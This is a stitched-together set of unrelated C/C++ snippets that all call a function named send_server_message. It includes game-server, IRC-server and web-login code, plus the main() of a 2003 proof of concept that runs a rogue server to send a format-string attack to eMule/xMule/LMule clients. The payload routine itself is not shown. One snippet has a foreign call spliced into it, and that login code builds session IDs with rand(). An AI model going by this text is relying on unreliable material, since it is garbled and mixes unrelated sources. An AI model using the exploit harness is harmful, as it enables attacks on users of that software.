void room::send_server_message_to_all(const char* message, network::connection exclude) const { simple_wml::document doc; send_server_message(message, 0, &doc); send_data(doc, exclude, "message"); }
int main (int argc, char *argv[]) { puts ("eMule/xMule/LMule OP_SERVERMESSAGE " "Format String Vulnerabilitytion Vulnerability\n" "proof of concept code\n" "Copyright (C) 2003 Rémi Denis-Courmont " "<*****@*****.**>\n"); if (argc > 3) return usage (argv[0]); else { int listenfd; const char *host, *port; port = (argc < 2) ? "4661" : argv[2]; host = (argc < 3) ? NULL : argv[3]; printf ("Binding to [%s]:%s ...\n", (host != NULL) ? host : "any", port); listenfd = socket_listen (host, port); if (listenfd == -1) { gai_perror (host); return 1; } while (1) { int clientfd; fputs ("Waiting for a client to connect ... ", stdout); clientfd = accept (listenfd, NULL, 0); if (clientfd == -1) { puts (""); perror ("Error"); continue; } puts ("OK"); fputs ("Sending server message ... ", stdout); if (send_server_message (clientfd)) { puts (""); perror ("Error"); } else puts ("Done"); close (clientfd); } } return 0; /* dead code */ }
// A handler for the /authorize endpoint. // Login page form sends user name and password to this endpoint. static void authorize(struct mg_connection *conn, const struct mg_request_info *request_info) { char user[MAX_USER_LEN], password[MAX_USER_LEN]; struct session *session; // Fetch user name and password. get_qsvar(request_info, "user", user, sizeof(user)); get_qsvar(request_info, "password", password, sizeof(password)); if (check_password(user, password) && (session = new_session()) != NULL) { // Authentication success: // 1. create new session // 2. set session ID token in the cookie // 3. remove original_url from the cookie - not needed anymore // 4. redirect client back to the original URL // // The most secure way is to stay HTTPS all the time. However, just to // show the technique, we redirect to HTTP after the successful // authentication. The danger of doing this is that session cookie can // be stolen and an attacker may impersonate the user. // Secure application must use HTTPS all the time. my_strlcpy(session->user, user, sizeof(session->user)); snprintf(session->random, sizeof(session->random), "%d", rand()); generate_session_id(session->session_id, session->random, session->user); send_server_message("<%s> joined", session->user); mg_printf(conn, "HTTP/1.1 302 Found\r\n" "Set-Cookie: session=%s; max-age=3600; http-only\r\n" // Session ID "Set-Cookie: user=%s\r\n" // Set user, needed by Javascript code "Set-Cookie: original_url=/; max-age=0\r\n" // Delete original_url "Location: /\r\n\r\n", session->session_id, session->user); } else { // Authentication failure, redirect to login. redirect_to_login(conn, request_info); } }
void send_server_message(const std::string& message, network::connection sock, simple_wml::document* docptr = NULL) const { send_server_message(message.c_str(), sock, docptr); }
/* ** DoNumeric (replacement for the old do_numeric) ** ** parc number of arguments ('sender' counted as one!) ** parv[0] pointer to 'sender' (may point to empty string) (not used) ** parv[1]..parv[parc-1] ** pointers to additional parameters, this is a NULL ** terminated list (parv[parc] == NULL). ** ** *WARNING* ** Numerics are mostly error reports. If there is something ** wrong with the message, just *DROP* it! Don't even think of ** sending back a neat error message -- big danger of creating ** a ping pong error message... */ int do_numeric(int numeric, aClient *cptr, aClient *sptr, int parc, char *parv[]) { aClient *acptr; aChannel *chptr; char *nick, *p; int i; /* Is this an outgoing connect, and we get a numeric 451 (not registered) back for the * magic command __PANGPANG__ and we did not send a SERVER message yet? * Then this means we are dealing with an Unreal server <3.2.9 and we should send the * SERVER command right now. */ if (!IsServer(sptr) && !IsPerson(sptr) && (numeric == 451) && (parc > 2) && strstr(parv[1], "__PANGPANG__") && IsHandshake(cptr) && sptr->serv && !IsServerSent(sptr)) { send_server_message(sptr); return 0; } if (parc < 1 || !IsServer(sptr)) return 0; /* Remap low number numerics. */ if (numeric < 100) numeric += 100; /* ** Prepare the parameter portion of the message into 'buffer'. ** (Because the buffer is twice as large as the message buffer ** for the socket, no overflow can occur here... ...on current ** assumptions--bets are off, if these are changed --msa) ** Note: if buffer is non-empty, it will begin with SPACE. */ buffer[0] = '\0'; if (parc > 2) { /* * For strlcat nazis, please read above */ for (i = 2; i < (parc - 1); i++) { (void)strcat(buffer, " "); (void)strcat(buffer, parv[i]); } (void)strcat(buffer, " :"); (void)strcat(buffer, parv[parc - 1]); } else sendto_realops("do_numeric( %i, %s, %s, %i, { %s, %s } )!", numeric, cptr->name, sptr->name, parc, parv[0], parv[1] ? parv[1] : "<null>"); for (; (nick = strtoken(&p, parv[1], ",")); parv[1] = NULL) { if ((acptr = find_client(nick, (aClient *)NULL))) { /* ** Drop to bit bucket if for me... ** ...one might consider sendto_ops ** here... --msa ** And so it was done. -avalon ** And regretted. Dont do it that way. Make sure ** it goes only to non-servers. -avalon ** Check added to make sure servers don't try to loop ** with numerics which can happen with nick collisions. ** - Avalon */ if (!IsMe(acptr) && IsPerson(acptr)) { /* Added for .U3.2. drop remote 'You are not on ** that channel', we should be synced anyway, ** and this is an annoying message with TSpre7 ** still on the net; would result in numeric 442 for ** every KICK... Can be removed when TSpre7 is gone. ** --Run if (numeric==ERR_NOTONCHANNEL) return 0; */ sendto_prefix_one(acptr, sptr, ":%s %d %s%s", parv[0], numeric, nick, buffer); } else if (IsServer(acptr) && acptr->from != cptr) sendto_prefix_one(acptr, sptr, ":%s %d %s%s", parv[0], numeric, nick, buffer); } else if ((acptr = find_server_quick(nick))) { if (!IsMe(acptr) && acptr->from != cptr) sendto_prefix_one(acptr, sptr, ":%s %d %s%s", parv[0], numeric, nick, buffer); } else if ((chptr = find_channel(nick, (aChannel *)NULL))) sendto_channel_butone(cptr, sptr, chptr, ":%s %d %s%s", parv[0], numeric, chptr->chname, buffer); } return 0; }
void send_server_message(const std::string& message, socket_ptr sock=socket_ptr(), simple_wml::document* doc=nullptr) const { send_server_message(message.c_str(), sock, doc); }